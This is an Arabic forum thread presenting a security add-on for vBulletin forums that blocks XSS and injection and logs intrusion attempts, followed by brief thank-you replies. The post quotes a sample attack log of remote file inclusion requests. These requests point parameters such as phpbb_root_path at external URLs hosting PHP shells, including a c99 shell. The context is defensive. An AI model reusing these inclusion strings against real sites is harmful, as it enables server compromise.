منتديات شباب الجزائر

العودة   منتدى شباب الجزائر لكل العرب > اقسام تطوير المواقع والمنتديات > منتدى تطوير المنتديات vbulletin 3.8.X

منتدى تطوير المنتديات vbulletin 3.8.X [خاص]:: يمنع منعاً باتا .. كتابة اي موضوع يهتم بمشاكل المنتديات (( يمنع وضع نسخ vBulletin ))

هاكـ الحماية الشاملة i.s.s.w v 4.1.1

الكلمات الدلالية (Tags)
الحماية, الشاملة, issw, هاكـ
 
المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مصحف الزهري الإلكتروني ( الموسوعة القرآنية الشاملة ) لا غني عنها في جهاز اي مسلم 3algeria ركن البرامج الاسلامية - Islamic programes 13 2015-06-08 07:53 PM
برنامج (Muslim Bag) الموسوعة الاسلامية الشاملة -اونلاين بها كل ما تبحث عنه toufik72 ركن البرامج الاسلامية - Islamic programes 5 2011-11-04 11:00 PM
الاعدادات الشاملة للاستايل css smail-dz منتدى استايلات vBulletin 1 2009-09-20 09:08 PM
شرح طريقة تلوين المجموعات من دون اي هاكـ او وجع راس Pam Samir ركن دروس وشروحات للـ vbulletin 2 2008-12-31 08:51 AM

 
LinkBack أدوات الموضوع انواع عرض الموضوع
  رقم المشاركة : ( 1 )  
قديم 2008-12-31
 

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

  KAKASASA غير متواجد حالياً  
رقم العضوية : 196
تاريخ التسجيل : Dec 2008
الدولة :
العمر :
الجنس :  male
مكان الإقامة : الجزائر
عدد المشاركات : 52 [+]
عدد النقاط : 10
قوة الترشيح : KAKASASA
افتراضي هاكـ الحماية الشاملة i.s.s.w v 4.1.1

بسم الله الرحمان الرحيم
:: ممنوع الاشهار لمنتديات اخرى:::
اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا


نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني




عمل الهاك : حماية المنتدى بشكل كامل بعون الله










الخيار الاول : لتشغيل حمايه المنتدي


منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح


منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%


حجب عدة مواقع تساعد على العبث في المنتديات


تطوير للدوال القديمة للتوافق معه السيرفر


منع اكثر اوامر اليونكس وحيل الحقن في الشيل


اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك


الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع



الان نأتي للقسم الاكثر اثارة للموضوع


عند دخولك مجلد sec


افتح الملف logfile_hacker.txt


ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل


كود:
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)

الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر


طبعا الفاصلة تفصل بين كل معلومه ومعلومة



كود PHP:

,




التاريخ والوقت

كود:
2007-12-11, 05:50:44

,







عدد المحاولات



كود:
1197370244




ايبي الموقع المصااب



كود:
209.67.223.188





الاصابة طبعا تشفرت لاغراض امنيه



كود:
p=11575//codebb/lang_select



الاستغلال

كود:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه



كود:
libwww-perl/5.808






الان شرح التركيب


امسح جميع هاكات لها علاقه في الحمايه او منع xss


اما من ركب هاك الحمايه issw v4.0 issw v3


عليه فقط حذف ملف البرودكت


وتركيب المحدث



شرح حذف الهاك



من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت


ومن ثم حذف توابعه


---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt


وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي


واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور


مع
تحيات الفريق الامني


الان من لوحت تحكم المنتدي قم برفع البرودكت



تم تجربت المنتج على الاصدار


3.6.x


3.7.0



لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت


يطرحه هنا في الموضوع لنصل لتطوير اكثر



وجل من لا يخطأ وشكرا لكم




الحمد لله على كل شيء


لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق


اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم



التحميل للزوار



التعديل الأخير تم بواسطة 3algeria ; 2008-12-31 الساعة 07:47 PM سبب آخر: ممنوع الاشهار
رد مع اقتباس
اعلانات
 
  رقم المشاركة : ( 2 )  
قديم 2008-12-31
 
::عضو شرف::

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

  عربية حرة غير متواجد حالياً  
رقم العضوية : 135
تاريخ التسجيل : Nov 2008
الدولة :
العمر :
الجنس :  female
مكان الإقامة : بلاد الأحلام
عدد المشاركات : 2,171 [+]
عدد النقاط : 267
قوة الترشيح : عربية حرة محترفعربية حرة محترفعربية حرة محترف
افتراضي رد: هاكـ الحماية الشاملة i.s.s.w v 4.1.1

شكرا لك أخي للموضوع و ننتظر منك المزيد من المواضيع المتميزة تقبل مروري

دمت برضا

رد مع اقتباس
  رقم المشاركة : ( 3 )  
قديم 2008-12-31
 

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

  KAKASASA غير متواجد حالياً  
رقم العضوية : 196
تاريخ التسجيل : Dec 2008
الدولة :
العمر :
الجنس :  male
مكان الإقامة : الجزائر
عدد المشاركات : 52 [+]
عدد النقاط : 10
قوة الترشيح : KAKASASA
افتراضي رد: هاكـ الحماية الشاملة i.s.s.w v 4.1.1

شكرا لمروركـ،
رد مع اقتباس
  رقم المشاركة : ( 4 )  
قديم 2009-01-01
 
xp

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

  xp غير متواجد حالياً  
رقم العضوية : 100
تاريخ التسجيل : Nov 2008
الدولة :
العمر :
الجنس :  male
مكان الإقامة : love computer
عدد المشاركات : 11 [+]
عدد النقاط : 10
قوة الترشيح : xp يستحق التمييز
افتراضي رد: هاكـ الحماية الشاملة i.s.s.w v 4.1.1

تسلم ايديك علي الموضوع الرائع تقبل خالص تحياتي
رد مع اقتباس
  رقم المشاركة : ( 5 )  
قديم 2009-01-01
 

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

  KAKASASA غير متواجد حالياً  
رقم العضوية : 196
تاريخ التسجيل : Dec 2008
الدولة :
العمر :
الجنس :  male
مكان الإقامة : الجزائر
عدد المشاركات : 52 [+]
عدد النقاط : 10
قوة الترشيح : KAKASASA
افتراضي رد: هاكـ الحماية الشاملة i.s.s.w v 4.1.1

شكرا لمروركـ،
رد مع اقتباس
  رقم المشاركة : ( 6 )  
قديم 2009-01-09
 

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

  hamzan95 غير متواجد حالياً  
رقم العضوية : 95
تاريخ التسجيل : Nov 2008
الدولة :
العمر :
الجنس :  male
مكان الإقامة : خنشلة الشاوية الأحرار
عدد المشاركات : 107 [+]
عدد النقاط : 20
قوة الترشيح : hamzan95
افتراضي رد: هاكـ الحماية الشاملة i.s.s.w v 4.1.1

هل يعمل على الاصدار 3.8.0 وشكرا جزيلا على الهاك المهم
رد مع اقتباس

مواقع النشر (المفضلة)



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

هاكـ الحماية الشاملة i.s.s.w v 4.1.1



التعليقات المنشورة لا تعبر عن رأي منتدى شباب الجزائر ولا نتحمل أي مسؤولية قانونية حيال ذلك ويتحمل كاتبها مسؤولية النشر

الساعة الآن 12:22 PM

Powered by vBulletin® Version 3.8.7 .Copyright ©2000 - 2015, Jelsoft Enterprises Ltd
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.
Designed & Developed by shababdz.com
جميع الحقوق محفوظة ©2014, منتدى شباب الجزائر لكل العرب